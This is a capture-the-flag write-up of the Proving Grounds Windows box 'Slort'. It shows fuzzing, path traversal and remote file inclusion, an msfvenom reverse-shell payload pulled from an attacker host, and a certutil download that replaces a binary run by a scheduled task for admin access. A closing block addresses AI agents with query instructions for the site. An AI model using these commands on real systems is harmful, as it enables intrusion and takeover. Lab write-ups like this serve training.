# Slort

**Source**: Proving Grounds\
**OS**: Windows\
**Community Rating**: Intermediate

## **Enumeration & Reconnaissance**

* I started as usual with autorecon which exposed: **FTP (21)**, 135, 139, 445, 3306, **HTTP (4443)**, 5040, **HTTP (8080)**, 49664 -> 49669

## **Service Analysis**

* FTP had no anonymous access so I started with the usual, HTTP. Both HTTP sites were XAMPP’s default page. Access to phpMyAdmin was denied, displaying the message:

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FHa0PDyz19Z59D6FQ71km%2Fimage.png?alt=media&#x26;token=34e2a95d-7389-4e8a-9013-e27bce98073f" alt="" width="375"><figcaption><p>XAMPP Default Page</p></figcaption></figure>

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FnQwiKbrNfIIxooZY24JZ%2Fimage.png?alt=media&#x26;token=d67cea3d-59d6-426b-9315-18fee71234c1" alt="" width="375"><figcaption><p>Access Forbidden</p></figcaption></figure>

* I checked the fuzzers but they exposed nothing, and neither SMB nor MySQL provided anything useful. I kept going in circles for a bit until I fuzzed the sites again with a different wordlist:

{% code overflow="wrap" fullWidth="true" %}

```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://192.168.213.53:4443:/FUZZ
```

{% endcode %}

* That’s when "**/site/**" was exposed. This directory contained a simple PHP page with the URL: `http://192.168.213.53:4443/site/index.php?page=main.php` *I’m sure if I were in an anime, a light bulb would have appeared with the text "File Inclusion" flashing before my eyes.*

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FVP5bpGBRJuPMsw6pJDeV%2Fimage.png?alt=media&#x26;token=844172f1-56b1-4f81-810b-8c2069a8c4a9" alt="" width="563"><figcaption><p>site Directory</p></figcaption></figure>

## **Gaining Initial Access**

* I tested the inclusion by visiting: `http://192.168.213.53:4443/site/index.php?page=..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\System32\drivers\etc\hosts` which worked!&#x20;

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2Fo5FFtJ7dJBBRTaBW3EES%2Fimage.png?alt=media&#x26;token=9144401a-e927-4ea5-b822-0a92c819f0c0" alt="" width="563"><figcaption><p>LFI Check</p></figcaption></figure>

* When facing a file inclusion vulnerability, it’s important to check whether it’s Remote File Inclusion (RFI) or only Local File Inclusion. Turns out we have RFI and that was it, we were able to get a shell!
* I generated a reverse shell payload with msfvenom:

{% code overflow="wrap" fullWidth="true" %}

```bash
msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=8178
```

{% endcode %}

* Then triggered it via the vulnerable parameter: `http://192.168.213.53:4443/site/index.php?page=http://192.168.45.170:901/shell.php`

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FL0l9K3c9kXUkYUcP8vxD%2Fimage.png?alt=media&#x26;token=db9bc8d1-ee42-4ded-bb34-69849f7f3350" alt="" width="563"><figcaption><p>Reverse Shell</p></figcaption></figure>

## **Privilege Escalation**

* Once I was in, I uploaded winPEAS and started checking around. The C drive had a Backup directory, and inside I found a file, **info.txt**, containing:

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FbyXN443Y17f7MgrsTZPy%2Fimage.png?alt=media&#x26;token=65adfee0-202d-4772-863a-bd3036269137" alt="" width="375"><figcaption><p>info.txt Content</p></figcaption></figure>

* This indicated a scheduled service (the Windows equivalent of cron jobs). I decided to see if I had permission over the directory. I performed the following steps:

{% code overflow="wrap" fullWidth="true" %}

```powershell
move TFTP.EXE TFTP_old.EXE
certutil -urlcache -split -f http://192.168.45.170:901/shell.exe
move shell.exe TFTP.EXE
```

{% endcode %}

* There we go, we got a shell back as an admin.

<figure><img src="https://2268123139-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FEUwn05Skx1RrmpCLRbWS%2Fuploads%2FQLeTWF9tS7kRuKyEYEz3%2Fimage.png?alt=media&#x26;token=75a2efb0-3a8b-42e7-ad5a-ae9ef17573ae" alt="" width="563"><figcaption><p>Privilege Escalation</p></figcaption></figure>

## **Lessons Learned**

* Fuzzing with alternative wordlists can reveal hidden directories when initial scans turn up nothing.
* File inclusion vulnerabilities can sometimes allow Remote File Inclusion, granting a quick path to a shell.
* Scheduled tasks or services that run binaries from writable directories are valuable privilege escalation vectors.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kayra.gitbook.io/hackerkayra/write-ups/proving-grounds-boxes/windows/slort.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.